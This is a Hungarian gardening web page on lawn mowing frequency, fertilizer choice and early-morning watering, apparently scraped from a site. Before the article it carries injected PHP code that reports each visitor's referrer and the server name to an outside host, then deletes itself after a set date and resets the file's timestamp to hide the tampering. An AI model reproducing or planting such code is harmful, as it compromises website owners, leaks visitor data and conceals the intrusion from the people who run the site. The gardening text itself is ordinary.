check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Mikor jó füvet nyírni?

Mikor jó füvet nyírni?

 

A fűnyírás általában hetente-kéthetente válhat szükségessé, attól függöen, mennyire gyakran öntözzük a gyepet. A fűnyírás után legtöbbször az egész kert hangulata meg tud változni. Ha nem gondozunk semmilyen növényt a kertben, elhanyagoljuk a fákat, egy fűnyírás ilyenkor is csodákra képes. Természetesen ez nem az jelenti, hogy nyugodtan elhanyagolhatjuk kertünket, mert igazán örömünket csak akkor fogjuk lelni, ha mindig ápolt és egészséges.

 

Mitől függ, hogy milyen gyakran nyírjuk a füvet?

 

A talaj tápanyagtartalmától, melyet befolyásolhatunk, ha megfelelő időben és megfelelő mennyiségben műtrágyázzuk a gyepet. Sok helyen halljuk, hogy milyen jók a tartós, hosszú hatású, lassan lebomló műtrágyák, azonban azt tudnunk kell, ha fűnyíróval átmegyünk a területen nem sokat ér. Sőt! Feleslegesen költünk rá többet, mert kevesebbet kapunk cserébe. A fűnyíró kése összedarabolja a fel nem oldódott gyantaréteggel bevont műtrágya golyócskákat, mely ez által tartósságából rögtön veszít. A fűnyírókés által összeszedett műtrágyát pedig a fűgyűjtővel a komposztba visszük. Ez alapvetően nem is lenne baj, ha ez lenne a célunk. Az így kiszórt műtrágya kb. 30-40 %-a hasznosul mindössze, mely a talajon megtapadva továbbra is biztosítja a füvünk számára a tápanyagot. De ha azonnal oldódó műtrágyát szórunk ki, akár kisebb mennyiségben, minden hónapban legalább egy alkalommal fűnyírás után, és beöntözés előtt, akkor nem kell attól tartanunk, hogy a fűnyíró felszedi a szemcséket, mert a második öntözés után már szinte az egész a talajba jut, és hasznosul a fűnövény számára. Tudnunk kell, hogy ez a fajta műtrágya gyorsabban hasznosul, de nagyobb részben mosódik ki a talajból, mégis sokkal olcsóbban jövünk ki, és hatékonyságában jóval a duplája a tartós hatású műtrágyának.

 

Az öntözés elhanyagolásából, rendszertelenségéből kifolyólag, ha mindössze akkor öntözzük a füvet, amikor már a kiszáradás szélén van, egészen biztos, hogy nem fogunk sokat gyönyörködni pázsitunkban, kertünkben. Öntözni a legjobb a hajnali órákban. Nem azért, mert nappal a fű kiég, ha vízéri, és nem is azért, mert olyankor zavar a legkevésbé a kertben való tartózkodásban, mindössze annyi az oka, hogy ilyenkor a legkisebb a párolgás, és reggelre a nedvesség beszivárog a talajba, ahonnan gyepünk egész nap az értékes öntözővizet felhasználja.  Mivel a párolgás ilyenkor alacsony, kb. 30 %-kal több vizet meg tudunk spórolni minden egyes öntözésnél. A fáradságos és időt rabló öntözési feladatokat legkönnyebben, öntözőrendszer segítségével valósíthatjuk meg, amely programozható időkapcsolóval rendelkezik, mert ugyan kinek van kedve hajnali 3-kor felkelni és hálóingben, papucsban beindítani az öntözést.

 

Egy szép gyep mindig megörvendezteti a szemlélőjét, az ápolt pázsit gondtalan pihenéssel jutalmazza meg a kert tulajdonosát.

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú